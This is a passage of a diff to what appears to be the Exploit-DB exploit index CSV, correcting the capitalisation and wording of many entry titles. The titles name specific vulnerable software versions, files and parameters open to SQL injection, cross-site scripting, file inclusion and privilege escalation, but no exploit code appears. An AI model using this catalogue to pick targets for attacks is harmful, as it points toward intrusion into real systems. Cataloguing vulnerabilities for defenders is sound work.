Garabík",cgi,webapps,0 26067,platforms/php/webapps/26067.txt,"Web Content Management - validsession.php strRootpath Parameter Cross-Site Scripting",2005-08-03,rgod,php,webapps,0 26068,platforms/php/webapps/26068.txt,"Web Content Management - list.php strTable Parameter Cross-Site Scripting",2005-08-03,rgod,php,webapps,0 26069,platforms/asp/webapps/26069.txt,"Naxtor E-directory 1.0 - Message.asp Cross-Site Scripting",2005-08-03,basher13,asp,webapps,0 @@ -23218,11 +23219,11 @@ id,file,description,date,author,platform,type,port 26327,platforms/php/webapps/26327.txt,"Utopia News Pro 1.1.3 - header.php sitetitle Parameter Cross-Site Scripting",2005-10-07,rgod,php,webapps,0 26075,platforms/hardware/remote/26075.txt,"MobileIron Virtual Smartphone Platform - Privilege Escalation",2013-06-10,prdelka,hardware,remote,0 26076,platforms/hardware/dos/26076.py,"Cisco ASA < 8.4.4.6 & 8.2.5.32 - Ethernet Information Leak",2013-06-10,prdelka,hardware,dos,0 -26077,platforms/php/webapps/26077.txt,"concrete5 CMS 5.6.1.2 - Multiple Vulnerabilities",2013-06-10,expl0i13r,php,webapps,0 +26077,platforms/php/webapps/26077.txt,"Concrete5 CMS 5.6.1.2 - Multiple Vulnerabilities",2013-06-10,expl0i13r,php,webapps,0 26297,platforms/php/webapps/26297.txt,"PHPMyFAQ 1.5.1 - Logs Unauthorized Access",2005-08-23,rgod,php,webapps,0 26298,platforms/php/webapps/26298.txt,"CMS Made Simple 0.10 - 'index.php' Cross-Site Scripting",2005-09-26,X1ngBox,php,webapps,0 -26299,platforms/windows/remote/26299.c,"multitheftauto 0.5 - Multiple Vulnerabilities",2005-09-26,"Luigi Auriemma",windows,remote,0 -26079,platforms/php/webapps/26079.txt,"Comdev ECommerce 3.0 - config.php Remote File Inclusion",2005-08-05,anonymous,php,webapps,0 +26299,platforms/windows/remote/26299.c,"MultiTheftAuto 0.5 - Multiple Vulnerabilities",2005-09-26,"Luigi Auriemma",windows,remote,0 +26079,platforms/php/webapps/26079.txt,"Comdev eCommerce 3.0 - config.php Remote File Inclusion",2005-08-05,anonymous,php,webapps,0 26080,platforms/php/webapps/26080.txt,"Comdev eCommerce 3.0 - WCE.download.php Directory Traversal",2005-08-05,anonymous,php,webapps,0 26081,platforms/php/webapps/26081.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - dwt_editor.php Multiple Parameter Cross-Site Scripting",2005-08-05,Lostmon,php,webapps,0 26082,platforms/php/webapps/26082.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - jax_newsletter.php language Parameter Cross-Site Scripting",2005-08-05,Lostmon,php,webapps,0 @@ -23232,7 +23233,7 @@ id,file,description,date,author,platform,type,port 26086,platforms/php/webapps/26086.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - jax_linklists.php Multiple Parameter Cross-Site Scripting",2005-08-05,Lostmon,php,webapps,0 26087,platforms/php/webapps/26087.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - jax_calendar.php Multiple Parameter Cross-Site Scripting",2005-08-05,Lostmon,php,webapps,0 26088,platforms/php/webapps/26088.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - shrimp_petition.php Multiple Parameter Cross-Site Scripting",2005-08-05,Lostmon,php,webapps,0 -26089,platforms/php/webapps/26089.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - guestbook File Client IP Disclosure",2005-08-05,Lostmon,php,webapps,0 +26089,platforms/php/webapps/26089.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - Guestbook File Client IP Disclosure",2005-08-05,Lostmon,php,webapps,0 26090,platforms/php/webapps/26090.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - guestbook_ips2block Banned IP List Disclosure",2005-08-05,Lostmon,php,webapps,0 26091,platforms/php/webapps/26091.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - ips2block Banned IP List Disclosure",2005-08-05,Lostmon,php,webapps,0 26092,platforms/php/webapps/26092.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - logfile.csv User IP Disclosure",2005-08-05,Lostmon,php,webapps,0 @@ -23257,7 +23258,7 @@ id,file,description,date,author,platform,type,port 26111,platforms/php/webapps/26111.txt,"Gravity Board X 1.1 - CSS Template Unauthorized Access",2005-08-08,rgod,php,webapps,0 26112,platforms/php/webapps/26112.txt,"PHP Lite Calendar Express 2.2 - 'login.php' cid Parameter SQL Injection",2005-08-08,almaster,php,webapps,0 26113,platforms/php/webapps/26113.txt,"PHP Lite Calendar Express 2.2 - auth.php cid Parameter SQL Injection",2005-08-08,almaster,php,webapps,0 -26114,platforms/php/webapps/26114.txt,"PHP Lite Calendar Express 2.2 - subscribe.php cid Parameter SQL Injection",2005-08-08,almaster,php,webapps,0 +26114,platforms/php/webapps/26114.txt,"PHP Lite Calendar Express 2.2 - Subscribe.php cid Parameter SQL Injection",2005-08-08,almaster,php,webapps,0 26115,platforms/php/webapps/26115.txt,"Calendar Express 2.2 - search.php Cross-Site Scripting",2005-08-08,almaster,php,webapps,0 26116,platforms/php/webapps/26116.txt,"Chipmunk CMS 1.3 - Fontcolor Cross-Site Scripting",2005-08-08,rgod,php,webapps,0 26117,platforms/php/webapps/26117.txt,"FunkBoard 0.66 - editpost.php Multiple Parameter Cross-Site Scripting",2005-08-08,rgod,php,webapps,0 @@ -23267,19 +23268,19 @@ id,file,description,date,author,platform,type,port 26121,platforms/php/webapps/26121.txt,"FunkBoard 0.66 - profile.php Multiple Parameter Cross-Site Scripting",2005-08-08,rgod,php,webapps,0 26122,platforms/php/webapps/26122.txt,"FunkBoard 0.66 - register.php Multiple Parameter Cross-Site Scripting",2005-08-08,rgod,php,webapps,0 26123,platforms/multiple/remote/26123.rb,"Java - Web Start Double Quote Injection Remote Code Execution (Metasploit)",2013-06-11,Rh0,multiple,remote,0 -26124,platforms/php/webapps/26124.txt,"Wordpress WP-SendSms Plugin 1.0 - Multiple Vulnerabilities",2013-06-11,expl0i13r,php,webapps,0 -26125,platforms/php/webapps/26125.txt,"Weathermap 0.97c - (editor.php mapname parameter) Local File Inclusion",2013-06-11,"Anthony Dubuissez",php,webapps,0 +26124,platforms/php/webapps/26124.txt,"WordPress WP-SendSms Plugin 1.0 - Multiple Vulnerabilities",2013-06-11,expl0i13r,php,webapps,0 +26125,platforms/php/webapps/26125.txt,"Weathermap 0.97c - (editor.php mapname Parameter) Local File Inclusion",2013-06-11,"Anthony Dubuissez",php,webapps,0 26126,platforms/php/webapps/26126.txt,"NanoBB 0.7 - Multiple Vulnerabilities",2013-06-11,"CWH Underground",php,webapps,0 26127,platforms/php/webapps/26127.txt,"TriggerTG TClanPortal 3.0 - Multiple SQL Injections",2005-08-09,admin@batznet.com,php,webapps,0 26128,platforms/osx/dos/26128.html,"Apple Safari 1.3 Web Browser - JavaScript Invalid Address Denial of Service",2005-08-09,"Patrick Webster",osx,dos,0 26129,platforms/hardware/webapps/26129.txt,"Buffalo WZR-HP-G300NH2 - Cross-Site Request Forgery",2013-06-11,"Prayas Kulshrestha",hardware,webapps,0 26130,platforms/windows/dos/26130.py,"WinRadius 2.11 - Denial of Service",2013-06-11,npn,windows,dos,0 26131,platforms/linux/local/26131.c,"Linux Kernel < 3.8.9 (x86_64) - 'perf_swevent_init' Privilege Escalation (2)",2013-06-11,"Andrea Bittau",linux,local,0 -26132,platforms/php/webapps/26132.txt,"Fobuc GuestBook 0.9 - SQL Injection",2013-06-11,"CWH Underground",php,webapps,0 +26132,platforms/php/webapps/26132.txt,"Fobuc Guestbook 0.9 - SQL Injection",2013-06-11,"CWH Underground",php,webapps,0 26133,platforms/windows/dos/26133.py,"Sami FTP Server 2.0.1 - RETR Denial of Service",2013-06-11,Chako,windows,dos,21 26134,platforms/windows/remote/26134.rb,"Synactis PDF In-The-Box - ConnectToSynactic Stack Buffer Overflow",2013-06-11,Metasploit,windows,remote,0 26135,platforms/multiple/remote/26135.rb,"Java Applet - Driver Manager Privileged toString() Remote Code Execution",2013-06-11,Metasploit,multiple,remote,0 -26136,platforms/php/webapps/26136.txt,"Simple PHP Agenda 2.2.8 - (edit_event.php eventid parameter) SQL Injection",2013-06-11,"Anthony Dubuissez",php,webapps,0 +26136,platforms/php/webapps/26136.txt,"Simple PHP Agenda 2.2.8 - (edit_event.php eventid Parameter) SQL Injection",2013-06-11,"Anthony Dubuissez",php,webapps,0 26137,platforms/windows/dos/26137.py,"Syslog Server 1.2.3 - Crash (PoC)",2013-06-12,npn,windows,dos,0 26138,platforms/hardware/dos/26138.txt,"Ubiquiti airCam RTSP Service 1.1.5 - Buffer Overflow",2013-06-12,"Core Security",hardware,dos,554 26139,platforms/windows/dos/26139.txt,"Gaim AIM/ICQ Protocols - Multiple Vulnerabilities",2005-08-10,"Brandon Perry",windows,dos,0 @@ -23295,7 +23296,7 @@ id,file,description,date,author,platform,type,port 26149,platforms/php/webapps/26149.txt,"MyBulletinBoard RC4 - polls.php polloptions Parameter SQL Injection",2005-08-12,phuket,php,webapps,0 26150,platforms/php/webapps/26150.txt,"MyBulletinBoard RC4 - search.php action Parameter SQL Injection",2005-08-12,phuket,php,webapps,0 26151,platforms/windows/remote/26151.txt,"Isemarket JaguarControl - ActiveX Control Buffer Overflow",2005-08-13,"Tacettin Karadeniz",windows,remote,0 -26152,platforms/osx/remote/26152.txt,"Apple Mac OSX 10.4 Weblog Server - Cross-Site Scripting",2005-08-15,"Donnie Werner",osx,remote,0 +26152,platforms/osx/remote/26152.txt,"Apple Mac OS X 10.4 Weblog Server - Cross-Site Scripting",2005-08-15,"Donnie Werner",osx,remote,0 26153,platforms/php/webapps/26153.txt,"My Image Gallery 1.4.1 - 'index.php' Multiple Parameter Cross-Site Scripting",2005-08-16,anonymous,php,webapps,0 26154,platforms/asp/webapps/26154.txt,"PersianBlog - Userslist.asp SQL Injection",2005-08-16,trueend5,asp,webapps,0 26155,platforms/php/webapps/26155.txt,"Soft4e ECW-Shop 6.0.2 - 'index.php' SQL Injection",2005-08-16,"John Cobb",php,webapps,0 @@ -23311,7 +23312,7 @@ id,file,description,date,author,platform,type,port 26165,platforms/php/webapps/26165.txt,"PHPTB Topic Board 2.0 - file_o.php absolutepath Parameter Remote File Inclusion",2005-08-17,"Filip Groszynski",php,webapps,0 26166,platforms/php/webapps/26166.txt,"PHPTB Topic Board 2.0 - tech_o.php absolutepath Parameter Remote File Inclusion",2005-08-17,"Filip Groszynski",php,webapps,0 26167,platforms/windows/remote/26167.pl,"Microsoft Visual Studio .NET - msdds.dll Remote Code Execution",2005-08-17,anonymous,windows,remote,0 -26168,platforms/hardware/remote/26168.txt,"Juniper Netscreen 5.0 - VPN Username Enumeration",2005-08-18,"Roy Hills",hardware,remote,0 +26168,platforms/hardware/remote/26168.txt,"Juniper NetScreen 5.0 - VPN Username Enumeration",2005-08-18,"Roy Hills",hardware,remote,0 26169,platforms/php/webapps/26169.txt,"W-Agora 4.2 - Site Parameter Directory Traversal",2005-08-18,matrix_killer,php,webapps,0 26170,platforms/php/webapps/26170.txt,"ATutor 1.5.1 - 'login.php' course Parameter Cross-Site Scripting",2005-08-18,matrix_killer,php,webapps,0 26171,platforms/php/webapps/26171.php,"PHPOutsourcing Zorum 3.5 - Prod.php Arbitrary Command Execution",2005-08-18,rgod,php,webapps,0 @@ -23328,8 +23329,8 @@ id,file,description,date,author,platform,type,port 26182,platforms/php/webapps/26182.txt,"Land Down Under 800 - 'index.php' Multiple Parameter Cross-Site Scripting",2005-08-20,bl2k,php,webapps,0 26183,platforms/php/webapps/26183.txt,"NEPHP 3.0.4 - browse.php Cross-Site Scripting",2005-08-22,bl2k,php,webapps,0 26184,platforms/php/webapps/26184.txt,"PHPKit 1.6.1 - 'member.php' SQL Injection",2005-08-22,phuket,php,webapps,0 -26185,platforms/osx/local/26185.txt,"Apple Mac OSX 10.4 - dsidentity Directory Services Account Creation and Deletion",2005-08-15,"Neil Archibald",osx,local,0 -26186,platforms/php/webapps/26186.txt,"RunCMS 1.1/1.2 NewBB_Plus and Messages Modules - Multiple SQL Injections",2005-08-22,"James Bercegay",php,webapps,0 +26185,platforms/osx/local/26185.txt,"Apple Mac OS X 10.4 - dsidentity Directory Services Account Creation and Deletion",2005-08-15,"Neil Archibald",osx,local,0 +26186,platforms/php/webapps/26186.txt,"RunCMS 1.1/1.2 Newbb_plus and Messages Modules - Multiple SQL Injections",2005-08-22,"James Bercegay",php,webapps,0 26187,platforms/php/webapps/26187.txt,"PostNuke 0.76 RC4b - Comments Module moderate Parameter Cross-Site Scripting",2005-08-22,"Maksymilian Arciemowicz",php,webapps,0 26188,platforms/php/webapps/26188.txt,"PostNuke 0.76 RC4b - user.php htmltext Parameter Cross-Site Scripting",2005-08-22,"Maksymilian Arciemowicz",php,webapps,0 26189,platforms/php/webapps/26189.txt,"PostNuke 0.75/0.76 DL - viewdownload.php SQL Injection",2005-08-22,"Maksymilian Arciemowicz",php,webapps,0 @@ -23337,12 +23338,12 @@ id,file,description,date,author,platform,type,port 26191,platforms/php/webapps/26191.txt,"SaveWebPortal 3.4 - Multiple Remote File Inclusion",2005-08-23,rgod,php,webapps,0 26192,platforms/php/webapps/26192.txt,"SaveWebPortal 3.4 - Multiple Cross-Site Scripting Vulnerabilities",2005-08-23,rgod,php,webapps,0 26193,platforms/php/webapps/26193.txt,"SaveWebPortal 3.4 - Multiple Directory Traversal Vulnerabilities",2005-08-23,rgod,php,webapps,0 -26194,platforms/windows/dos/26194.txt,"LeapFTP Client 2.7.3/2.7.4 - .LSQ File Remote Buffer Overflow",2005-08-24,Sowhat,windows,dos,0 +26194,platforms/windows/dos/26194.txt,"LeapFTP Client 2.7.3/2.7.4 - '.LSQ' File Remote Buffer Overflow",2005-08-24,Sowhat,windows,dos,0 26195,platforms/linux/local/26195.txt,"QNX RTOS 6.1/6.3 - InputTrap Local Arbitrary File Disclosure",2005-08-24,"Julio Cesar Fort",linux,local,0 26196,platforms/windows/remote/26196.txt,"BEA WebLogic 7.0/8.1 - Administration Console Cross-Site Scripting",2005-08-24,GomoR,windows,remote,0 26197,platforms/php/webapps/26197.txt,"Foojan PHPWeblog - Html Injection",2005-08-24,ali202,php,webapps,0 26198,platforms/linux/remote/26198.txt,"Astaro Security Linux 6.0 01 - HTTP CONNECT Unauthorized Access",2005-08-25,"Oliver Karow",linux,remote,0 -26199,platforms/php/webapps/26199.txt,"PHPMyAdmin 2.x - error.php Cross-Site Scripting",2005-08-28,"Michal Cihar",php,webapps,0 +26199,platforms/php/webapps/26199.txt,"phpMyAdmin 2.x - error.php Cross-Site Scripting",2005-08-28,"Michal Cihar",php,webapps,0 26200,platforms/php/webapps/26200.txt,"SqWebMail 5.0.4 - HTML Email IMG Tag Script Injection",2005-08-29,"Jakob Balle",php,webapps,0 26201,platforms/php/webapps/26201.txt,"PHPWebNotes 2.0 - Api.php Remote File Inclusion",2005-08-29,nf2@scheinwelt.at,php,webapps,0 26202,platforms/php/webapps/26202.txt,"Looking Glass - Cross-Site Scripting",2005-08-27,rgod,php,webapps,0 @@ -23351,10 +23352,10 @@ id,file,description,date,author,platform,type,port 26205,platforms/php/webapps/26205.txt,"Land Down Under 700/701/800/801 - 'index.php' c Parameter SQL Injection",2005-08-29,matrix_killer,php,webapps,0 26206,platforms/php/webapps/26206.txt,"Land Down Under 700/701/800/801 - events.php c Parameter SQL Injection",2005-08-29,matrix_killer,php,webapps,0 26207,platforms/php/webapps/26207.txt,"Land Down Under 700/701/800/801 - list.php Multiple Parameter SQL Injection",2005-08-29,matrix_killer,php,webapps,0 -26208,platforms/php/webapps/26208.txt,"AutoLinks 2.1 Pro - Al_initialize.php Remote File Inclusion",2005-08-29,4Degrees,php,webapps,0 +26208,platforms/php/webapps/26208.txt,"Autolinks 2.1 Pro - Al_initialize.php Remote File Inclusion",2005-08-29,4Degrees,php,webapps,0 26209,platforms/php/webapps/26209.txt,"PHP-Fusion 4.0/5.0/6.0 - BBCode URL Tag Script Injection",2005-08-29,slacker4ever_1,php,webapps,0 26210,platforms/multiple/remote/26210.txt,"bfcommand & control server 1.22/2.0/2.14 manager - Multiple Vulnerabilities",2005-08-29,"Luigi Auriemma",multiple,remote,0 -26211,platforms/php/webapps/26211.txt,"PHPldapadmin 0.9.6/0.9.7 - welcome.php custom_welcome_page Variable Arbitrary File Inclusion",2005-08-30,rgod,php,webapps,0 +26211,platforms/php/webapps/26211.txt,"phpLDAPadmin 0.9.6/0.9.7 - welcome.php custom_welcome_page Variable Arbitrary File Inclusion",2005-08-30,rgod,php,webapps,0 26212,platforms/php/webapps/26212.txt,"FlatNuke 2.5.6 - ID Parameter Directory Traversal",2005-08-31,rgod,php,webapps,0 26213,platforms/php/webapps/26213.txt,"LibrettoCMS 2.2.2 - Arbitrary File Upload",2013-06-14,"CWH Underground",php,webapps,0 26214,platforms/windows/dos/26214.py,"Easy LAN Folder Share 3.2.0.100 - Buffer Overflow",2013-06-14,ariarat,windows,dos,0 @@ -23372,16 +23373,16 @@ id,file,description,date,author,platform,type,port 26226,platforms/php/webapps/26226.txt,"MAXdev MD-Pro 1.0.73 - Multiple Cross-Site Scripting Vulnerabilities",2005-09-06,rgod,php,webapps,0 26227,platforms/php/webapps/26227.txt,"MyBulletinBoard 1.0 - forumdisplay.php Cross-Site Scripting",2005-09-06,Dominic.Parikh,php,webapps,0 26228,platforms/php/webapps/26228.txt,"MyBulletinBoard 1.0 - Multiple SQL Injections",2005-09-06,stranger-killer,php,webapps,0 -26229,platforms/php/webapps/26229.txt,"PHPCommunityCalendar 4.0 - Multiple SQL Injections",2005-09-07,rgod,php,webapps,0 +26229,platforms/php/webapps/26229.txt,"phpCommunityCalendar 4.0 - Multiple SQL Injections",2005-09-07,rgod,php,webapps,0 26230,platforms/windows/remote/26230.txt,"Microsoft IIS 5.1 - WebDAV HTTP Request Source Code Disclosure",2005-09-04,"Inge Henriksen",windows,remote,0 26231,platforms/php/webapps/26231.txt,"PBLang 4.65 Bulletin Board System - SetCookie.php Directory Traversal",2005-09-07,rgod,php,webapps,0 -26232,platforms/php/webapps/26232.txt,"PHPCommunityCalendar 4.0 - Multiple Cross-Site Scripting Vulnerabilities",2005-09-07,rgod,php,webapps,0 +26232,platforms/php/webapps/26232.txt,"phpCommunityCalendar 4.0 - Multiple Cross-Site Scripting Vulnerabilities",2005-09-07,rgod,php,webapps,0 26233,platforms/hardware/dos/26233.txt,"Cisco IOS 12.x - Firewall Authentication Proxy Buffer Overflow",2005-09-07,Markus,hardware,dos,0 26234,platforms/php/webapps/26234.txt,"Stylemotion WEB//NEWS 1.4 - startup.php Cookie SQL Injection",2005-09-08,onkel_fisch,php,webapps,0 26235,platforms/php/webapps/26235.txt,"Stylemotion WEB//NEWS 1.4 - news.php Multiple Parameter SQL Injection",2005-09-08,onkel_fisch,php,webapps,0 26236,platforms/php/webapps/26236.txt,"Stylemotion WEB//NEWS 1.4 - print.php id Parameter SQL Injection",2005-09-08,onkel_fisch,php,webapps,0 26237,platforms/php/webapps/26237.txt,"AMember Pro 2.3.4 - Remote File Inclusion",2005-09-08,"NewAngels Team",php,webapps,0 -26240,platforms/php/webapps/26240.txt,"Ultimate Wordpress Auction Plugin 1.0 - Cross-Site Request Forgery",2013-06-17,expl0i13r,php,webapps,0 +26240,platforms/php/webapps/26240.txt,"Ultimate WordPress Auction Plugin 1.0 - Cross-Site Request Forgery",2013-06-17,expl0i13r,php,webapps,0 26241,platforms/php/webapps/26241.txt,"Fly-High CMS 2012-07-08 - Unrestricted File Upload Exploit",2013-06-17,"CWH Underground",php,webapps,0 26242,platforms/windows/local/26242.py,"Adrenalin Player 2.2.5.3 - '.wax' SEH Buffer Overflow",2013-06-17,Onying,windows,local,0 26243,platforms/php/webapps/26243.txt,"Havalite CMS 1.1.7 - Unrestricted File Upload Exploit",2013-06-17,"CWH Underground",php,webapps,0 @@ -23393,7 +23394,7 @@ id,file,description,date,author,platform,type,port 26249,platforms/linux/dos/26249.c,"Zebedee 2.4.1 - Remote Denial of Service",2005-09-09,Shiraishi.M,linux,dos,0 40300,platforms/php/webapps/40300.py,"HelpDeskZ 1.0.2 - Unauthenticated Arbitrary File Upload",2016-08-29,"Lars Morgenroth",php,webapps,80 26251,platforms/linux/dos/26251.c,"Snort 2.x - PrintTcpOptions Remote Denial of Service",2005-09-12,"VulnFact Security Labs",linux,dos,0 -26252,platforms/php/webapps/26252.txt,"Subscribe Me Pro 2.44 - S.pl Remote Directory Traversal",2005-09-13,h4cky0u,php,webapps,0 +26252,platforms/php/webapps/26252.txt,"Subscribe Me Pro 2.44 - S.pl Directory Traversal",2005-09-13,h4cky0u,php,webapps,0 26253,platforms/php/webapps/26253.txt,"Land Down Under 800/801 - auth.php m Parameter SQL Injection",2005-09-13,"GroundZero Security Research",php,webapps,0 26254,platforms/php/webapps/26254.txt,"Land Down Under 800/801 - plug.php e Parameter SQL Injection",2005-09-13,"GroundZero Security Research",php,webapps,0 26255,platforms/php/webapps/26255.php,"Mail-it Now! Upload2Server 1.5 - Arbitrary File Upload",2005-09-13,rgod,php,webapps,0 @@ -23410,7 +23411,7 @@ id,file,description,date,author,platform,type,port 26266,platforms/php/webapps/26266.txt,"DeluxeBB 1.0 - forums.php fid Parameter SQL Injection",2005-09-15,abducter,php,webapps,0 26267,platforms/php/webapps/26267.txt,"DeluxeBB 1.0 - pm.php uid Parameter SQL Injection",2005-09-15,abducter,php,webapps,0 26268,platforms/php/webapps/26268.txt,"DeluxeBB 1.0 - newpost.php fid Parameter SQL Injection",2005-09-15,abducter,php,webapps,0 -26333,platforms/asp/webapps/26333.html,"Aenovo - /password/default.asp password Field SQL Injection",2005-10-07,"farhad koosha",asp,webapps,0 +26333,platforms/asp/webapps/26333.html,"Aenovo - /Password/default.asp Password Field SQL Injection",2005-10-07,"farhad koosha",asp,webapps,0 26334,platforms/asp/webapps/26334.txt,"aeNovo - /incs/searchdisplay.asp strSQL Parameter SQL Injection",2005-10-07,"farhad koosha",asp,webapps,0 26270,platforms/php/webapps/26270.txt,"Content2Web 1.0.1 - Multiple Input Validation Vulnerabilities",2005-09-16,"Security Tester",php,webapps,0 26271,platforms/osx/dos/26271.txt,"Apple Safari 1.x/2.0.1 - Data URI Memory Corruption",2005-09-17,"Jonathan Rockway",osx,dos,0 @@ -23431,7 +23432,7 @@ id,file,description,date,author,platform,type,port 26286,platforms/php/webapps/26286.txt,"PHP Advanced Transfer Manager 1.30 - Multiple Directory Traversal Vulnerabilities",2005-09-20,rgod,php,webapps,0 26287,platforms/php/webapps/26287.txt,"PHP Advanced Transfer Manager 1.30 - Multiple Cross-Site Scripting Vulnerabilities",2005-09-20,rgod,php,webapps,0 26300,platforms/php/webapps/26300.txt,"LucidCMS 2.0 - 'index.php' Cross-Site Scripting",2005-09-27,X1ngBox,php,webapps,0 -26301,platforms/windows/dos/26301.txt,"Novell GroupWise 6.5.3 Client - Local Integer Overflow",2005-09-27,"Francisco Amato",windows,dos,0 +26301,platforms/windows/dos/26301.txt,"Novell Groupwise 6.5.3 Client - Local Integer Overflow",2005-09-27,"Francisco Amato",windows,dos,0 26302,platforms/php/webapps/26302.txt,"TWiki TWikiUsers - INCLUDE Function Arbitrary Command Execution",2005-09-28,JChristophFuchs,php,webapps,0 26303,platforms/php/webapps/26303.txt,"CubeCart 3.0.3 - 'index.php' Multiple Parameter Cross-Site Scripting",2005-09-28,Lostmon,php,webapps,0 26304,platforms/php/webapps/26304.txt,"CubeCart 3.0.3 - cart.php redir Parameter Cross-Site Scripting",2005-09-28,Lostmon,php,webapps,0 @@ -23444,8 +23445,8 @@ id,file,description,date,author,platform,type,port 26311,platforms/php/webapps/26311.txt,"IceWarp Web Mail 5.5.1 - calendar_w.html createdataCX Parameter Cross-Site Scripting",2005-09-30,ss_contacts,php,webapps,0 26312,platforms/php/webapps/26312.txt,"EasyGuppy 4.5.4/4.5.5 - Printfaq.php Directory Traversal",2005-09-30,"Josh Zlatin-Amishav",php,webapps,0 26313,platforms/php/webapps/26313.txt,"Merak Mail Server 8.2.4 r - Arbitrary File Deletion",2005-09-30,ShineShadow,php,webapps,0 -26386,platforms/php/webapps/26386.txt,"Nuked-Klan 1.7 Forum Module - Multiple Parameter SQL Injection",2005-10-24,papipsycho,php,webapps,0 -26387,platforms/php/webapps/26387.txt,"Nuked-Klan 1.7 Sections Module - artid Parameter SQL Injection",2005-10-24,papipsycho,php,webapps,0 +26386,platforms/php/webapps/26386.txt,"Nuked-klaN 1.7 Forum Module - Multiple Parameter SQL Injection",2005-10-24,papipsycho,php,webapps,0 +26387,platforms/php/webapps/26387.txt,"Nuked-klaN 1.7 Sections Module - artid Parameter SQL Injection",2005-10-24,papipsycho,php,webapps,0 26316,platforms/php/webapps/26316.php,"imacs CMS 0.3.0 - Unrestricted File Upload Exploit",2013-06-19,"CWH Underground",php,webapps,0 26330,platforms/multiple/remote/26330.txt,"Oracle HTML DB 1.5/1.6 - wwv_flow.accept p_t02 Parameter Cross-Site Scripting",2005-10-07,Red-Database-Security,multiple,remote,0 26331,platforms/multiple/dos/26331.txt,"Oracle 9.0 iSQL*Plus TLS Listener - Remote Denial of Service",2005-10-07,"Alexander Kornbrust",multiple,dos,0 @@ -23475,7 +23476,7 @@ id,file,description,date,author,platform,type,port 26348,platforms/php/webapps/26348.txt,"Complete PHP Counter - SQL Injection",2005-10-14,BiPi_HaCk,php,webapps,0 26349,platforms/php/webapps/26349.txt,"Complete PHP - Counter Cross-Site Scripting",2005-10-14,BiPi_HaCk,php,webapps,0 26350,platforms/php/webapps/26350.txt,"PunBB 1.2.x - search.php SQL Injection",2005-10-15,Devil_box,php,webapps,0 -26351,platforms/asp/webapps/26351.txt,"Comersus BackOffice Plus - Multiple Cross-Site Scripting Vulnerabilities",2005-10-17,Lostmon,asp,webapps,0 +26351,platforms/asp/webapps/26351.txt,"Comersus Backoffice Plus - Multiple Cross-Site Scripting Vulnerabilities",2005-10-17,Lostmon,asp,webapps,0 26352,platforms/php/local/26352.php,"PHP 5.0.5 - Safedir Restriction Bypass Vulnerabilities",2005-10-17,anonymous,php,local,0 26353,platforms/linux/local/26353.txt,"Linux Kernel 2.6 - Console Keymap Local Command Injection (PoC)",2005-10-17,"Rudolf Polzer",linux,local,0 26354,platforms/jsp/webapps/26354.txt,"NetFlow Analyzer 4 - Cross-Site Scripting",2005-10-18,why@nsfocus.com,jsp,webapps,0 @@ -23485,7 +23486,7 @@ id,file,description,date,author,platform,type,port 26358,platforms/php/webapps/26358.txt,"MySource 2.14 - header.php bgcolor Parameter Cross-Site Scripting",2005-10-18,"Secunia Research",php,webapps,0 26359,platforms/php/webapps/26359.txt,"MySource 2.14 - edit_table_row_props.php bgcolor Parameter Cross-Site Scripting",2005-10-18,"Secunia Research",php,webapps,0 26360,platforms/php/webapps/26360.txt,"MySource 2.14 - edit_table_props.php bgcolor Parameter Cross-Site Scripting",2005-10-18,"Secunia Research",php,webapps,0 -26361,platforms/php/webapps/26361.txt,"MySource 2.14 - edit_table_cell_type_wysiwyg.php stylesheet Parameter Cross-Site Scripting",2005-10-18,"Secunia Research",php,webapps,0 +26361,platforms/php/webapps/26361.txt,"MySource 2.14 - edit_table_cell_type_wysiwyg.php Stylesheet Parameter Cross-Site Scripting",2005-10-18,"Secunia Research",php,webapps,0 26362,platforms/php/webapps/26362.txt,"MySource 2.14 - new_upgrade_functions.php Multiple Parameter Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 26363,platforms/php/webapps/26363.txt,"MySource 2.14 - init_mysource.php INCLUDE_PATH Parameter Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 26364,platforms/php/webapps/26364.txt,"MySource 2.14 - Socket.php PEAR_PATH Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 @@ -23501,7 +23502,7 @@ id,file,description,date,author,platform,type,port 26374,platforms/windows/remote/26374.txt,"Xerver 4.17 - Single Dot File Request Source Disclosure",2005-10-19,"Ziv Kamir",windows,remote,0 26375,platforms/windows/remote/26375.txt,"Xerver 4.17 - Forced Directory Listing",2005-10-19,"Ziv Kamir",windows,remote,0 26376,platforms/windows/remote/26376.txt,"Xerver 4.17 Server - URI Null Character Cross-Site Scripting",2005-10-19,"Ziv Kamir",windows,remote,0 -26377,platforms/php/webapps/26377.txt,"PHP-Nuke Search Module - modules.php Remote Directory Traversal",2005-10-19,sp3x@securityreason.com,php,webapps,0 +26377,platforms/php/webapps/26377.txt,"PHP-Nuke Search Module - modules.php Directory Traversal",2005-10-19,sp3x@securityreason.com,php,webapps,0 26378,platforms/php/webapps/26378.txt,"Chipmunk Forum - newtopic.php forumID Parameter Cross-Site Scripting",2005-10-20,"Alireza Hassani",php,webapps,0 26379,platforms/php/webapps/26379.txt,"Chipmunk Forum - quote.php forumID Parameter Cross-Site Scripting",2005-10-20,"Alireza Hassani",php,webapps,0 26380,platforms/php/webapps/26380.txt,"Chipmunk Forum - recommend.php ID Parameter Cross-Site Scripting",2005-10-20,"Alireza Hassani",php,webapps,0 @@ -23510,12 +23511,12 @@ id,file,description,date,author,platform,type,port 26383,platforms/php/webapps/26383.txt,"Zomplog 3.3/3.4 - detail.php HTML Injection",2005-10-22,sikikmail,php,webapps,0 26384,platforms/php/webapps/26384.txt,"FlatNuke 2.5.x - 'index.php' Multiple Remote File Inclusion",2005-10-22,abducter_minds@yahoo.com,php,webapps,0 26385,platforms/php/webapps/26385.txt,"FlatNuke 2.5.x - 'index.php' Cross-Site Scripting",2005-10-26,alex@aleksanet.com,php,webapps,0 -26388,platforms/php/webapps/26388.txt,"Nuked-Klan 1.7 Download Module - dl_id Parameter SQL Injection",2005-10-24,papipsycho,php,webapps,0 -26389,platforms/php/webapps/26389.pl,"Nuked-Klan 1.7 